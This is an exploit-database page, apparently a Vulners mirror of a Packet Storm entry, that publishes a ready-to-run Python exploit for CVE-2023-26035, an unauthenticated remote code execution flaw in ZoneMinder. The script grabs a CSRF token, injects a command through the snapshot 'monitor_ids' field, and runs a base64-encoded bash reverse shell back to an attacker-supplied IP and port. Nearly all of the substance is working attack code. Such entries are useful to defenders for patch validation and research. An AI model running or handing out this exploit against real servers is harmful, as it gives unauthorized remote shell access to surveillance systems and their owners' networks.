Lucene search
K

ZoneMinder Snapshots Remote Code Execution

🗓️ 19 Mar 2024 00:00:00Reported by Ravindu Wickramasinghe, github.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 267 Views

ZoneMinder Snapshots Remote Code Execution. Unauthenticated RCE in ZoneMinder prior to version 1.36.33 and 1.37.33. Exploits a CSRF vulnerability to execute arbitrary commands via a crafted payload.

Related
Code
`import re  
import requests  
from bs4 import BeautifulSoup  
import argparse  
import base64  
  
# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots  
# Date: 12 December 2023  
# Discovered by : @Unblvr1  
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)  
# Vendor Homepage: https://zoneminder.com/  
# Software Link: https://github.com/ZoneMinder/zoneminder  
# Version: prior to 1.36.33 and 1.37.33  
# Tested on: Arch Linux, Kali Linux  
# CVE : CVE-2023-26035  
# Github Link : https://github.com/rvizx/CVE-2023-26035  
  
  
class ZoneMinderExploit:  
def __init__(self, target_uri):  
self.target_uri = target_uri  
self.csrf_magic = None  
  
def fetch_csrf_token(self):  
print("[>] fetching csrt token")  
response = requests.get(self.target_uri)  
self.csrf_magic = self.get_csrf_magic(response)  
if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):  
print(f"[>] recieved the token: {self.csrf_magic}")  
return True  
print("[!] unable to fetch or parse token.")  
return False  
  
def get_csrf_magic(self, response):  
return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)  
  
def execute_command(self, cmd):  
print("[>] sending payload..")  
data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}  
response = requests.post(f"{self.target_uri}/index.php", data=data)  
print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")  
  
def exploit(self, payload):  
if self.fetch_csrf_token():  
print(f"[>] executing...")  
self.execute_command(payload)  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser()  
parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')  
parser.add_argument('-ip', '--local-ip', required=True, help='local ip')  
parser.add_argument('-p', '--port', required=True, help='port')  
args = parser.parse_args()  
  
# generating the payload  
ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"   
ps2 = base64.b64encode(ps1.encode()).decode()  
payload = f"echo {ps2} | base64 -d | /bin/bash"  
  
ZoneMinderExploit(args.target_url).exploit(payload)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation